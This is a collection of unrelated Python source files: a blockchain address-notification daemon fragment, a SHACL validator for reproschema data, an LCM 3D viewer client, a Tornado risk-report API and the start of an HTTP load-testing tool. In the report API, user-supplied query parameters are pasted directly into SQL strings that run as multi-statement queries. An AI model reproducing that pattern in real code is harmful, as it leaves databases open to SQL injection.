# find all the addresses that related to this tx
related_addresses = self.get_related_addresses(tx)
for address in related_addresses:
if address in addr_txs_map:
addr_txs_map[address].append(tx)
else:
addr_txs_map[address] = [tx]
except Exception as e:
logger.error(e)
return addr_txs_map
def create_notifications(self, addr_txs_map):
try:
subscriptions = AddressSubscription.objects.all()
new_notifications = []
# Only the address that is in addr_txs_map and subscription needs to be notified,
# so iterate through the small one is more efficient
if len(addr_txs_map) < subscriptions.count():
                for address, txs in addr_txs_map.items():
for tx in txs:
for subscription in subscriptions.filter(address=address):
new_notifications.append(AddressNotification(subscription=subscription, tx_hash=tx.txid))
else:
for subscription in subscriptions:
if subscription.address in addr_txs_map:
for tx in addr_txs_map[subscription.address]:
new_notifications.append(AddressNotification(subscription=subscription, tx_hash=tx.txid))
AddressNotification.objects.bulk_create(new_notifications)
except Exception as e:
logger.error(e)
def get_related_addresses(self, tx):
if tx.type == 'NORMAL' and 'coinbase' in tx.vin[0]:
# this tx is the first tx of every block, just skip
return []
addresses = []
# addresses in vin
for vin in tx.vin:
if 'coinbase' not in vin:
prev_vout = self.get_prev_vout(vin['txid'], vin['vout'])
addresses.extend(self.get_address_from_vout(prev_vout))
# addresses in vout
for vout in tx.vout:
addresses.extend(self.get_address_from_vout(vout))
return list(set(addresses))
def get_prev_vout(self, tx_hash, n):
tx = self.get_transaction(tx_hash)
return tx.vout[n]
def get_address_from_vout(self, vout):
script_pub_key = vout['scriptPubKey']
return script_pub_key.get('addresses', [])
    def set_last_seen_block(self, block_hash):
        try:
            # update_or_create avoids dereferencing None when no row exists yet
            LastSeenBlock.objects.update_or_create(
                name='AddressNotifyDaemon',
                defaults={'block_hash': block_hash}
            )
        except Exception as e:
            logger.error(e)
def get_last_seen_block(self):
try:
last_block = LastSeenBlock.objects.filter(name='AddressNotifyDaemon').first()
if last_block:
return self.conn.getblock(last_block.block_hash)
else:
genesis_block = self.conn.getblock(self.conn.getblockhash(0))
LastSeenBlock.objects.create(name='AddressNotifyDaemon', block_hash=genesis_block['hash'])
return genesis_block
        except Exception as e:
logger.error(e)
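# Minimal standalone sketch of the walk-back performed in get_new_blocks above:
# start from the best block and follow previousblockhash until the last seen
# block is reached, then reverse so blocks come out oldest-first. The in-memory
# chain is illustrative only; the daemon fetches blocks over RPC.
def _example_walk_back(chain_by_hash, best_hash, last_seen_hash):
    block = chain_by_hash[best_hash]
    new_blocks = []
    while block['hash'] != last_seen_hash:
        new_blocks.append(block)
        block = chain_by_hash[block['previousblockhash']]
    # e.g. for a chain a <- b <- c, _example_walk_back(chain, 'c', 'a') == [b, c]
    return new_blocks[::-1]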
|
validate.py
|
import requests
import requests_cache
import tempfile
requests_cache.install_cache(tempfile.mkdtemp())
from pyld import jsonld
from pyshacl import validate
import json
import os
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
def simple_http_server(host='localhost', port=4001, path='.'):
"""
From: https://stackoverflow.com/a/38943044
"""
server = HTTPServer((host, port), SimpleHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
    thread.daemon = True
cwd = os.getcwd()
def start():
os.chdir(path)
thread.start()
print('starting server on port {}'.format(server.server_port))
def stop():
os.chdir(cwd)
server.shutdown()
server.socket.close()
print('stopping server on port {}'.format(server.server_port))
return start, stop
data_file_format = 'nquads'
shape_file_format = 'turtle'
def validate_data(data, root, name, shape_file_path):
base_url = f"http://localhost:8000/{root}/"
normalized = jsonld.normalize(data,
{'algorithm': 'URDNA2015',
'base': base_url,
'format': 'application/n-quads'})
conforms, v_graph, v_text = validate(normalized,
shacl_graph=shape_file_path,
data_graph_format=data_file_format,
shacl_graph_format=shape_file_format,
inference='rdfs', debug=False,
serialize_report_graph=True)
print(base_url + name, 'Conforms:', conforms)
if not conforms:
raise ValueError(v_text)
start, stop = simple_http_server(port=8000, path=os.getcwd())
start()
for root, dirs, files in os.walk('activities'):
for name in files:
full_file_name = os.path.join(root, name)
with open(full_file_name) as json_file:
try:
data = json.load(json_file)
if '@type' not in data:
raise ValueError(f"{full_file_name} missing @type")
if data['@type'] == 'reproschema:Protocol':
shape_file_path = 'validation/ProtocolShape.ttl'
elif data['@type'] == 'reproschema:Activity':
shape_file_path = 'validation/ActivityShape.ttl'
elif data['@type'] == 'reproschema:Field':
shape_file_path = 'validation/FieldShape.ttl'
                elif data['@type'] == 'reproschema:ResponseOptions':
                    shape_file_path = 'validation/ResponseOptionsShape.ttl'
                else:
                    raise ValueError(f"{full_file_name} has unrecognized @type {data['@type']}")
                validate_data(data, root, name, shape_file_path)
except ValueError as e:
print ("File '%s' has validation errors: \n %s" %(full_file_name, e))
stop()
requests_cache.clear()
raise
stop()
requests_cache.clear()
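# Minimal self-contained sketch of the pyshacl call made in validate_data above,
# using tiny in-memory turtle graphs instead of the reproschema shape files.
# The example shape and data are illustrative only.
def _example_shacl_check():
    shape_ttl = """
    @prefix sh: <http://www.w3.org/ns/shacl#> .
    @prefix ex: <http://example.org/> .
    ex:PersonShape a sh:NodeShape ;
        sh:targetClass ex:Person ;
        sh:property [ sh:path ex:name ; sh:minCount 1 ] .
    """
    data_ttl = """
    @prefix ex: <http://example.org/> .
    ex:alice a ex:Person ; ex:name "Alice" .
    """
    conforms, _report_graph, report_text = validate(data_ttl,
                                                    shacl_graph=shape_ttl,
                                                    data_graph_format='turtle',
                                                    shacl_graph_format='turtle',
                                                    inference='rdfs')
    return conforms, report_text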
|
viewerclient.py
|
# Used only in removed tests; to be removed.
import time
import json
import os
import tempfile
import threading
from collections import defaultdict
try:
    from collections.abc import Iterable
except ImportError:  # Python 2 / < 3.3
    from collections import Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
def __init__(self):
self.pid = os.getpid()
self.counter = 0
def new_client_id(self):
self.counter += 1
return "py_{:d}_{:d}".format(self.pid, self.counter)
CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
msg = viewer2_comms_t()
msg.utime = data["utime"]
msg.format = "treeviewer_json"
msg.format_version_major = 1
msg.format_version_minor = 0
msg.data = bytearray(json.dumps(data), encoding="utf-8")
msg.num_bytes = len(msg.data)
return msg
def serialize_transform(tform):
return {
"translation": list(transformations.translation_from_matrix(tform)),
"quaternion": list(transformations.quaternion_from_matrix(tform)),
}
class GeometryData(object):
__slots__ = ["geometry", "color", "transform"]
def __init__(self, geometry, color=(1.0, 1.0, 1.0, 1.0), transform=np.eye(4)):
self.geometry = geometry
self.color = color
self.transform = transform
def serialize(self):
params = self.geometry.serialize()
params["color"] = list(self.color)
params["transform"] = serialize_transform(self.transform)
return params
class BaseGeometry(object):
def serialize(self):
raise NotImplementedError()
class Box(BaseGeometry):
__slots__ = ["lengths"]
def __init__(self, lengths=[1, 1, 1]):
self.lengths = lengths
def serialize(self):
return {"type": "box", "lengths": list(self.lengths)}
class Sphere(BaseGeometry):
__slots__ = ["radius"]
def __init__(self, radius=1):
self.radius = radius
def serialize(self):
return {"type": "sphere", "radius": self.radius}
class Ellipsoid(BaseGeometry):
__slots__ = ["radii"]
def __init__(self, radii=[1, 1, 1]):
self.radii = radii
def serialize(self):
return {"type": "ellipsoid", "radii": list(self.radii)}
class Cylinder(BaseGeometry):
__slots__ = ["length", "radius"]
def __init__(self, length=1, radius=1):
self.length = length
self.radius = radius
def serialize(self):
return {"type": "cylinder", "length": self.length, "radius": self.radius}
class Triad(BaseGeometry):
__slots__ = ["tube", "scale"]
def __init__(self, scale=1.0, tube=False):
self.scale = scale
self.tube = tube
def serialize(self):
return {"type": "triad", "scale": self.scale, "tube": self.tube}
class PolyLine(BaseGeometry):
def __init__(
self,
points,
radius=0.01,
closed=False,
start_head=False,
end_head=False,
head_radius=0.05,
head_length=None,
):
self.points = points
self.radius = radius
self.closed = closed
self.start_head = start_head
self.end_head = end_head
self.head_radius = head_radius
self.head_length = head_length if head_length is not None else head_radius
def serialize(self):
data = {
"type": "line",
"points": self.points,
"radius": self.radius,
"closed": self.closed,
}
if self.start_head or self.end_head:
data["start_head"] = self.start_head
data["end_head"] = self.end_head
data["head_radius"] = self.head_radius
data["head_length"] = self.head_length
return data
class LazyTree(object):
__slots__ = ["geometries", "transform", "children"]
def __init__(self, geometries=None, transform=np.eye(4)):
if geometries is None:
geometries = []
self.geometries = geometries
self.transform = transform
self.children = defaultdict(lambda: LazyTree())
def __getitem__(self, item):
return self.children[item]
def getdescendant(self, path):
t = self
for p in path:
t = t[p]
return t
def descendants(self, prefix=tuple()):
result = []
for (key, val) in list(self.children.items()):
childpath = prefix + (key,)
result.append(childpath)
result.extend(val.descendants(childpath))
return result
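# Small sketch of how LazyTree auto-creates nodes: indexing with a new key
# builds an empty child on demand, and descendants() lists every path touched
# so far. Illustrative only; the real tree is populated by CoreVisualizer below.
def _example_lazytree_paths():
    tree = LazyTree()
    tree.getdescendant(("robot", "arm")).geometries = [GeometryData(Box())]
    tree["robot"]["base"].transform = np.eye(4)
    # -> [("robot",), ("robot", "arm"), ("robot", "base")]
    return tree.descendants()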
class CommandQueue(object):
def __init__(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
def isempty(self):
return not (self.settransform or self.setgeometry or self.delete)
def empty(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
class Visualizer(object):
"""
A Visualizer is a lightweight object that contains a CoreVisualizer and a
path. The CoreVisualizer does all of the work of storing geometries and
publishing LCM messages. By storing the path in the Visualizer instance,
we make it easy to do things like store or pass a Visualizer that draws to
a sub-part of the viewer tree.
Many Visualizer objects can all share the same CoreVisualizer.
"""
__slots__ = ["core", "path"]
def __init__(self, path=None, lcm=None, core=None):
if core is None:
core = CoreVisualizer(lcm)
if path is None:
path = tuple()
else:
if isinstance(path, str):
path = tuple(path.split("/"))
if not path[0]:
path = tuple([p for p in path if p])
self.core = core
self.path = path
def setgeometry(self, geomdata):
"""
Set the geometries at this visualizer's path to the given
geomdata (replacing whatever was there before).
geomdata can be any one of:
* a single BaseGeometry
* a single GeometryData
* a collection of any combinations of BaseGeometry and GeometryData
"""
self.core.setgeometry(self.path, geomdata)
return self
def settransform(self, tform):
"""
Set the transform for this visualizer's path (and, implicitly,
any descendants of that path).
tform should be a 4x4 numpy array representing a homogeneous transform
"""
self.core.settransform(self.path, tform)
def delete(self):
"""
Delete the geometry at this visualizer's path.
"""
self.core.delete(self.path)
def __getitem__(self, path):
"""
Indexing into a visualizer returns a new visualizer with the given
path appended to this visualizer's path.
"""
return Visualizer(path=self.path + (path,), lcm=self.core.lcm, core=self.core)
def start_handler(self):
"""
Start a Python thread that will subscribe to messages from the remote
viewer and handle those responses. This enables automatic reloading of
geometry into the viewer if, for example, the viewer is restarted
later.
"""
self.core.start_handler()
class CoreVisualizer(object):
def __init__(self, lcm=None):
if lcm is None:
lcm = LCM()
self.lcm = lcm
self.client_id = CLIENT_ID_FACTORY.new_client_id()
self.tree = LazyTree()
self.queue = CommandQueue()
self.publish_immediately = True
self.lcm.subscribe(self._response_channel(), self._handle_response)
self.handler_thread = None
def _request_channel(self):
return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)
def _response_channel(self):
return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)
def _handler_loop(self):
while True:
self.lcm.handle()
def start_handler(self):
if self.handler_thread is not None:
return
self.handler_thread = threading.Thread(target=self._handler_loop)
self.handler_thread.daemon = True
self.handler_thread.start()
def _handle_response(self, channel, msgdata):
msg = viewer2_comms_t.decode(msgdata)
data = json.loads(msg.data.decode())
if data["status"] == 0:
pass
elif data["status"] == 1:
for path in self.tree.descendants():
self.queue.setgeometry.add(path)
self.queue.settransform.add(path)
else:
raise ValueError(
"Unhandled response from viewer: {}".format(msg.data.decode())
)
def setgeometry(self, path, geomdata):
if isinstance(geomdata, BaseGeometry):
self._load(path, [GeometryData(geomdata)])
elif isinstance(geomdata, Iterable):
self._load(path, geomdata)
else:
self._load(path, [geomdata])
def _load(self, path, geoms):
converted_geom_data = []
for geom in geoms:
if isinstance(geom, GeometryData):
converted_geom_data.append(geom)
else:
converted_geom_data.append(GeometryData(geom))
self.tree.getdescendant(path).geometries = converted_geom_data
self.queue.setgeometry.add(path)
self._maybe_publish()
def settransform(self, path, tform):
self.tree.getdescendant(path).transform = tform
self.queue.settransform.add(path)
self._maybe_publish()
def delete(self, path):
if not path:
self.tree = LazyTree()
else:
t = self.tree.getdescendant(path[:-1])
if path[-1] in t.children:
del t.children[path[-1]]
self.queue.delete.add(path)
self._maybe_publish()
def _maybe_publish(self):
if self.publish_immediately:
self.publish()
def publish(self):
if not self.queue.isempty():
data = self.serialize_queue()
msg = to_lcm(data)
self.lcm.publish(self._request_channel(), msg.encode())
self.queue.empty()
def serialize_queue(self):
delete = []
setgeometry = []
settransform = []
for path in self.queue.delete:
delete.append({"path": path})
for path in self.queue.setgeometry:
geoms = self.tree.getdescendant(path).geometries or []
setgeometry.append(
{"path": path, "geometries": [geom.serialize() for geom in geoms]}
)
for path in self.queue.settransform:
settransform.append(
{
"path": path,
"transform": serialize_transform(
self.tree.getdescendant(path).transform
),
}
)
return {
"utime": int(time.time() * 1e6),
"delete": delete,
"setgeometry": setgeometry,
"settransform": settransform,
}
if __name__ == "__main__":
# We can provide an initial path if we want
vis = Visualizer(path="/root/folder1")
# Start a thread to handle responses from the viewer. Doing this enables
# the automatic reloading of missing geometry if the viewer is restarted.
vis.start_handler()
vis["boxes"].setgeometry(
[
GeometryData(
Box([1, 1, 1]),
color=np.random.rand(4),
transform=transformations.translation_matrix([x, -2, 0]),
)
for x in range(10)
]
)
# Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
# implemented, so these sub-visualizers come into being as soon as they're
# asked for
vis = vis["group1"]
box_vis = vis["box"]
sphere_vis = vis["sphere"]
box = Box([1, 1, 1])
geom = GeometryData(box, color=[0, 1, 0, 0.5])
box_vis.setgeometry(geom)
sphere_vis.setgeometry(Sphere(0.5))
sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))
vis["test"].setgeometry(Triad())
vis["test"].settransform(
transformations.concatenate_matrices(
transformations.rotation_matrix(1.0, [0, 0, 1]),
transformations.translation_matrix([-1, 0, 1]),
)
)
vis["triad"].setgeometry(Triad())
# Setting the geometry preserves the transform at that path.
# Call settransform(np.eye(4)) if you want to clear the transform.
vis["test"].setgeometry(Triad())
    # Known bug: the sphere is loaded and replaces the previous geometry,
    # but it is not drawn with the correct color mode
vis["test"].setgeometry(Sphere(0.5))
for theta in np.linspace(0, 2 * np.pi, 100):
vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
time.sleep(0.01)
# vis.delete()
|
notice_report.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import logging
import threading
from tornado import gen
import tornado_mysql
from nebula.models.engine import tornado_mysql_config
from nebula.dao.user_dao import authenticated
from nebula.dao import cache
from nebula.views.base import BaseHandler
logger = logging.getLogger('nebula.api.notice_report')
mutex = threading.Lock()
CONDITIONS_QUERY = 'timestamp >= %s AND timestamp <= %s'
# Risk notice trend
RISK_TREND_QUERY = 'SELECT `tsHour`, sum(`count`) FROM notice_stat WHERE %s GROUP BY `tsHour`'
# SQL for risk type distribution
RISK_TAG_TOP_QUERY = 'SELECT tag, sum(`count`) FROM notice_stat WHERE tag != "" AND %s GROUP BY tag ORDER BY sum(`count`) DESC'
# SQL for risk-user statistics
RISK_DISCOVER_USER_QUERY = 'SELECT count(DISTINCT `key`) FROM notice_stat WHERE check_type = "USER" AND %s'
RISK_BLOCK_USER_QUERY = 'SELECT count(DISTINCT `key`) FROM notice_stat WHERE check_type = "USER" AND test = FALSE AND %s'
RISK_USER_TOP_QUERY = 'SELECT `key`, tag, sum(`count`), `tsHour` FROM notice_stat WHERE check_type = "USER" AND %s AND `key` IN (SELECT t.`key` FROM (SELECT `key` FROM notice_stat WHERE check_type = "USER" AND %s GROUP BY `key` ORDER BY sum(`count`) DESC LIMIT 10) AS t) GROUP BY `key`, tag, `tsHour`'
# SQL for risk-IP statistics
RISK_DISCOVER_IP_QUERY = 'SELECT count(DISTINCT `key`) FROM notice_stat WHERE check_type = "IP" AND %s'
RISK_BLOCK_IP_QUERY = 'SELECT count(DISTINCT `key`) FROM notice_stat WHERE check_type = "IP" AND test = FALSE AND %s'
RISK_IP_TOP_QUERY = 'SELECT `key`, geo_city, tag, sum(`count`), `tsHour` FROM notice_stat WHERE check_type = "IP" AND %s AND `key` IN (SELECT t.`key` FROM (SELECT `key` FROM notice_stat WHERE check_type = "IP" AND %s GROUP BY `key` ORDER BY sum(`count`) DESC LIMIT 10)AS t) GROUP BY `key`, geo_city, tag, `tsHour`'
RISK_GEO_TOP_QUERY = 'SELECT geo_city, sum(`count`) FROM notice_stat WHERE check_type = "IP" AND %s GROUP BY geo_city ORDER BY sum(`count`) DESC LIMIT 8'
RISK_URL_TOP_QUERY = 'SELECT uri_stem, sum(`count`), `tsHour` FROM notice_stat WHERE check_type = "IP" AND %s AND `uri_stem` IN (SELECT t.`uri_stem` FROM (SELECT `uri_stem` FROM notice_stat WHERE check_type = "IP" AND %s GROUP BY `uri_stem` ORDER BY sum(`count`) DESC LIMIT 10)AS t) GROUP BY uri_stem, `tsHour`'
notice_report = {}
def set_notice_report_value(key, value=None):
with mutex:
notice_report[key] = value
def risk_trend_callback(cursor, *args):
    # Risk notice trend; hours with no data are filled with 0
trend_ts = args[0]
risk_trend_tmp = {}
for r in cursor:
timestamp, count = r
risk_trend_tmp[timestamp] = int(count)
set_notice_report_value(
'risk_trend', [{ts: risk_trend_tmp.get(ts, 0)} for ts in trend_ts])
def risk_tag_top_callback(cursor, *args):
    # Risk type distribution: keep the top five tags and aggregate the rest under "other"
risk_tag_top = [{tag: int(count)} for tag, count in cursor[:5]]
other_tag_count = sum([int(count) for _, count in cursor[5:]])
if other_tag_count > 0:
risk_tag_top.append({u'其他': other_tag_count})
set_notice_report_value('risk_tag_top', risk_tag_top)
def risk_discover_user_callback(cursor, *args):
    # Total number of risk users
for _ in cursor:
user_count = int(_[0])
set_notice_report_value('risk_discover_stat_user', user_count)
def risk_block_user_callback(cursor, *args):
    # Total number of blocked risk users (blocked means test = FALSE)
for _ in cursor:
user_count = int(_[0])
set_notice_report_value('risk_block_stat_user', user_count)
def risk_user_top_callback(cursor, *args):
    # Data for the top 10 risk users
risk_user_top = []
trend_ts = args[0]
last_key = None
for _ in cursor:
key, tag, count, timestamp = _
if key == last_key:
risk_user_top[-1]['type'][tag] = risk_user_top[-1][
'type'].get(tag, 0) + int(count)
risk_user_top[-1]['trend'][timestamp] = risk_user_top[-1][
'trend'].get(timestamp, 0) + int(count)
risk_user_top[-1]['count'] += int(count)
else:
last_key = key
last_user = {
'name': key,
'trend': {timestamp: int(count)},
'type': {tag: int(count)},
'count': int(count)
}
risk_user_top.append(last_user)
risk_user_top = sorted(risk_user_top, key=lambda _: _[
'count'], reverse=True)
for user in risk_user_top:
user['trend'] = [{ts: user['trend'].get(ts, 0)} for ts in trend_ts]
set_notice_report_value('risk_user_top', risk_user_top)
def risk_ip_top_callback(cursor, *args):
    # Data for the top 10 risk IPs
risk_ip_top = []
trend_ts = args[0]
last_key = ''
for _ in cursor:
key, geo_city, tag, count, timestamp = _
if key == last_key:
risk_ip_top[-1]['type'][tag] = risk_ip_top[-1][
'type'].get(tag, 0) + int(count)
risk_ip_top[-1]['trend'][timestamp] = risk_ip_top[-1][
'trend'].get(timestamp, 0) + int(count)
risk_ip_top[-1]['count'] += int(count)
else:
last_key = key
last_ip = {
'name': key,
'trend': {timestamp: int(count)},
'type': {tag: int(count)},
'geo_city': geo_city,
'count': int(count)
}
risk_ip_top.append(last_ip)
risk_ip_top = sorted(risk_ip_top, key=lambda _: _['count'], reverse=True)
for ip in risk_ip_top:
ip['trend'] = [{ts: ip['trend'].get(ts, 0)} for ts in trend_ts]
set_notice_report_value('risk_ip_top', risk_ip_top)
def risk_discover_ip_callback(cursor, *args):
    # Total number of risk IPs
for _ in cursor:
ip_count = int(_[0])
set_notice_report_value('risk_discover_stat_ip', ip_count)
def risk_block_ip_callback(cursor, *args):
    # Total number of blocked risk IPs (blocked means test = FALSE)
for _ in cursor:
ip_count = int(_[0])
set_notice_report_value('risk_block_stat_ip', ip_count)
def risk_geo_top_callback(cursor, *args):
    # Geographic distribution of risk IPs
risk_geo_top = []
for _ in cursor:
city, count = _
risk_geo_top.append({city: int(count)})
set_notice_report_value('risk_geo_top', risk_geo_top)
def risk_url_top_callback(cursor, *args):
    # Top 10 URLs visited by risk IPs
trend_ts = args[0]
risk_url_top = []
last_uri_stem = None
for _ in cursor:
uri_stem, count, timestamp = _
if uri_stem == last_uri_stem:
risk_url_top[-1]['trend'][timestamp] = int(count)
risk_url_top[-1]['count'] += int(count)
else:
last_uri_stem = uri_stem
last_uri = {
'name': uri_stem,
'trend': {timestamp: int(count)},
'count': int(count)
}
risk_url_top.append(last_uri)
risk_url_top = sorted(risk_url_top, key=lambda _: _['count'], reverse=True)
for url in risk_url_top:
url['trend'] = [{ts: url['trend'].get(ts, 0)} for ts in trend_ts]
set_notice_report_value('risk_url_top', risk_url_top)
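# Tiny illustration of the callback contract used above: each callback receives
# the rows fetched for its SQL statement (plus the hourly timestamps where
# needed) and writes its slice of the report into the shared notice_report
# dict. The rows here are made up.
def _example_tag_top_rows():
    fake_rows = [('scraping', 12), ('credential_stuffing', 9), ('spam', 3)]
    risk_tag_top_callback(fake_rows)
    # notice_report['risk_tag_top'] == [{'scraping': 12}, {'credential_stuffing': 9}, {'spam': 3}]
    return notice_report['risk_tag_top']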
class NoticeReportHandler(BaseHandler):
REST_URL = '/platform/stats/notice_report'
@gen.coroutine
@authenticated
def get(self):
"""
        @API
        summary: risk notice report data API
        tags:
          - platform
        parameters:
          - name: key
            in: query
            required: false
            type: string
            description: substring that the notice key should contain
          - name: strategy
            in: query
            required: false
            type: string
            description: strategy hit by the notice; multiple strategy names supported
          - name: sceneType
            in: query
            required: false
            type: string
            description: scene hit by the notice; multiple scenes supported
          - name: checkType
            in: query
            required: false
            type: string
            description: notice check type; multiple types supported
          - name: decision
            in: query
            required: false
            type: string
            description: suggested notice decision; multiple decisions supported
          - name: fromtime
            in: query
            required: true
            type: timestamp
            description: notice alarm time should be greater than or equal to fromtime
          - name: endtime
            in: query
            required: true
            type: timestamp
            description: notice alarm time should be less than or equal to endtime
          - name: test
            in: query
            required: false
            type: boolean
            description: whether the notice is a test notice
          - name: tag
            in: query
            required: false
            type: string
            description: filter notice strategy tag
        produces:
          - application/json
"""
key = self.get_argument('key', default=None)
fromtime = self.get_argument('fromtime', default=None)
endtime = self.get_argument('endtime', default=None)
strategies = self.get_arguments('strategy')
scene_types = self.get_arguments('sceneType')
check_types = self.get_arguments('checkType')
decisions = self.get_arguments('decision')
test = self.get_argument('test', default=None)
        tags = self.get_arguments('tag')  # strategy risk tags
self.set_header('content-type', 'application/json')
if not fromtime or not endtime:
self.process_error(-1, '缺少fromtime或endtime参数')
return
        # Build the query condition clause; round timestamps down to whole hours (in ms)
        hour = 3600000
        fromtime = int(fromtime) // 1000 // 3600 * hour
        endtime = int(endtime) // 1000 // 3600 * hour
        # Avoid fromtime 12:00:00 and endtime 12:59:59 both collapsing to 12:00:00 after
        # rounding: adjust endtime so at least one full hour after fromtime is returned
if fromtime == endtime:
endtime = fromtime + hour
trend_ts = [ts for ts in range(fromtime, endtime + hour, hour)]
conditions_query = CONDITIONS_QUERY % (fromtime, endtime)
if key:
conditions_query = conditions_query + ' AND ' + '`key` = "%s"' % key
if tags:
            # Look up strategy names by risk tag
if cache.Strategy_Weigh_Cache is None:
from nebula.dao.strategy_dao import init_strategy_weigh
init_strategy_weigh()
strategy_weigh = filter(lambda s: list(set(tags) & (
set(s['tags']))), cache.Strategy_Weigh_Cache.values())
strategies.extend([s['name'] for s in strategy_weigh])
if strategies:
conditions_query = conditions_query + ' AND ' + \
"strategy_name IN (%s)" % ','.join(
['"%s"' % _ for _ in strategies])
if scene_types:
conditions_query = conditions_query + ' AND ' + \
'scene_name IN (%s)' % ','.join(
['"%s"' % _ for _ in scene_types])
if check_types:
conditions_query = conditions_query + ' AND ' + \
'check_type IN (%s)' % ','.join(
['"%s"' % _ for _ in check_types])
if decisions:
conditions_query = conditions_query + ' AND ' + \
'decision IN (%s)' % ','.join(['"%s"' % _ for _ in decisions])
if test is not None:
test = 'TRUE' if test.lower() == 'true' else 'FALSE'
conditions_query = conditions_query + ' AND ' + 'test = %s' % test
try:
            # Initialize the database connection
conn = yield tornado_mysql.connect(**tornado_mysql_config)
cursor = conn.cursor()
sql_list = list()
callback_list = list()
            # Query the risk notice trend
            sql_list.append(RISK_TREND_QUERY % conditions_query)
            callback_list.append(risk_trend_callback)
            # Query the risk type distribution
            sql_list.append(RISK_TAG_TOP_QUERY % conditions_query)
            callback_list.append(risk_tag_top_callback)
            # Query risk-user statistics
if check_types and 'USER' not in check_types:
set_notice_report_value('risk_discover_stat_user', 0)
set_notice_report_value('risk_block_stat_user', 0)
set_notice_report_value('risk_user_top', 0)
else:
                # Query the total number of risk users
                sql_list.append(RISK_DISCOVER_USER_QUERY % conditions_query)
                callback_list.append(risk_discover_user_callback)
                # Query the total number of blocked risk users
                if test == 'TRUE':
                    set_notice_report_value('risk_block_stat_user', 0)
                else:
                    sql_list.append(RISK_BLOCK_USER_QUERY % conditions_query)
                    callback_list.append(risk_block_user_callback)
                # Query the top 10 risk users
sql_list.append(RISK_USER_TOP_QUERY %
(conditions_query, conditions_query))
callback_list.append(risk_user_top_callback)
            # Query risk-IP statistics
if check_types and 'IP' not in check_types:
set_notice_report_value('risk_discover_stat_ip', 0)
set_notice_report_value('risk_block_stat_ip', 0)
set_notice_report_value('risk_ip_top', [])
set_notice_report_value('risk_geo_top', [])
set_notice_report_value('risk_url_top', [])
else:
                # Query the total number of risk IPs
                sql_list.append(RISK_DISCOVER_IP_QUERY % conditions_query)
                callback_list.append(risk_discover_ip_callback)
                # Query the total number of blocked risk IPs
                if test == 'TRUE':
                    set_notice_report_value('risk_block_stat_ip', 0)
                else:
                    sql_list.append(RISK_BLOCK_IP_QUERY % conditions_query)
                    callback_list.append(risk_block_ip_callback)
                # Query the top 10 risk IPs
                sql_list.append(RISK_IP_TOP_QUERY %
                                (conditions_query, conditions_query))
                callback_list.append(risk_ip_top_callback)
                # Geographic distribution of risk IPs
                sql_list.append(RISK_GEO_TOP_QUERY % conditions_query)
                callback_list.append(risk_geo_top_callback)
                # Top 10 URLs visited by risk IPs
sql_list.append(RISK_URL_TOP_QUERY %
(conditions_query, conditions_query))
callback_list.append(risk_url_top_callback)
            # Execute the queued statements against the database
            sql_statements = ';'.join(sql_list)
            yield cursor.execute(sql_statements)
            # Run each result set's callback in its own thread
threads = []
for callback in callback_list:
t = threading.Thread(
target=callback, args=(cursor.fetchall(), trend_ts))
threads.append(t)
yield cursor.nextset()
for t in threads:
t.setDaemon(True)
t.start()
t.join()
cursor.close()
conn.close()
            # Return the aggregated results once all threads have finished
self.finish(json.dumps(
{'status': 200, 'msg': 'ok', 'values': notice_report}))
except Exception as e:
logger.error(e)
self.process_error(-1, '报表生成失败,请重新查询')
|
tolerance.py
|
from threading import Thread
import threading
import Queue
import time
from socket import error as SocketError
import sys
try:
import requests
import curses
import click
except ImportError:
print 'Tolerance requires the following Python modules: Requests and Click. You should be able to ' \
'`sudo pip install requests click`'
sys.exit(1)
import utils
q = Queue.Queue()
result_codes = {}
_timeout = None
elapsed = []
timeout_count = 0
connection_error_count = 0
non_200_count = 0
durations = []
main_start = None
status = "Starting up"
test_number = 1
total_seconds = 0
test_start = None
test_stop = None
test_seconds = None
target_hits = None
requests_handled = 0
_tolerance = None
_url = None
hits = None
workers = None
break_out = False
import logging
logging.basicConfig(filename='log.log', level=logging.WARNING)
def do_work():
global _timeout, timeout_count, connection_error_count, main_start, status, non_200_count, total_seconds, \
test_start, test_stop, requests_handled, _tolerance, break_out
while True:
try:
url = q.get(True, 2)
except Queue.Empty:
break
status = "Running"
if test_start is None:
test_start = time.time()
if main_start is None:
main_start = time.time()
try:
start = time.time()
res = requests.get(url, timeout=_timeout)
elapsed.append(res.elapsed.total_seconds())
if '%s %s' % (res.status_code, res.reason) not in result_codes:
result_codes['%s %s' % (res.status_code, res.reason)] = 0
result_codes['%s %s' % (res.status_code, res.reason)] += 1
if res.status_code == 200:
durations.append(time.time() - start)
else:
non_200_count += 1
except requests.RequestException:
timeout_count += 1
non_200_count += 1
except SocketError:
connection_error_count += 1
non_200_count += 1
requests_handled += 1
if non_200_count > _tolerance:
break_out = True
test_stop = time.time()
with q.mutex:
q.queue.clear()
q.task_done()
status = "Failed, stopping..."
break
if requests_handled == target_hits:
test_stop = time.time()
q.task_done()
def update_ui_worker():
    global main_start, total_seconds, _timeout, hits, workers, status, test_number, test_start, \
        test_stop, requests_handled, test_seconds, _tolerance, _url, break_out
while True:
rc = utils.render_result_codes(result_codes, timeout_count, connection_error_count)
if not q.empty() and main_start:
total_seconds = time.time()-main_start
screen.addstr(1, 2, 'PAIN TOLERANCE on %s' % _url, curses.color_pair(3)|curses.A_BOLD)
screen.addstr(3, 2, 'Status: %s ' % status)
screen.addstr(5, 2, 'Trying %s hits with %s workers ' % (hits, workers))
screen.addstr(6, 2, 'Timeout: %s seconds ' % (_timeout,))
screen.addstr(6, 40, 'Tolerance: %s errors ' % (_tolerance,))
screen.addstr(7, 2, 'Active Workers: %s ' % (threading.active_count() - 2))
screen.addstr(7, 40, 'Queue: %s ' % q.qsize())
if test_start is None:
test_seconds = 0
else:
if test_stop is None:
test_seconds = time.time() - test_start
else:
test_seconds = test_stop - test_start
screen.addstr(9, 2, 'Test Seconds: %.2f ' % test_seconds)
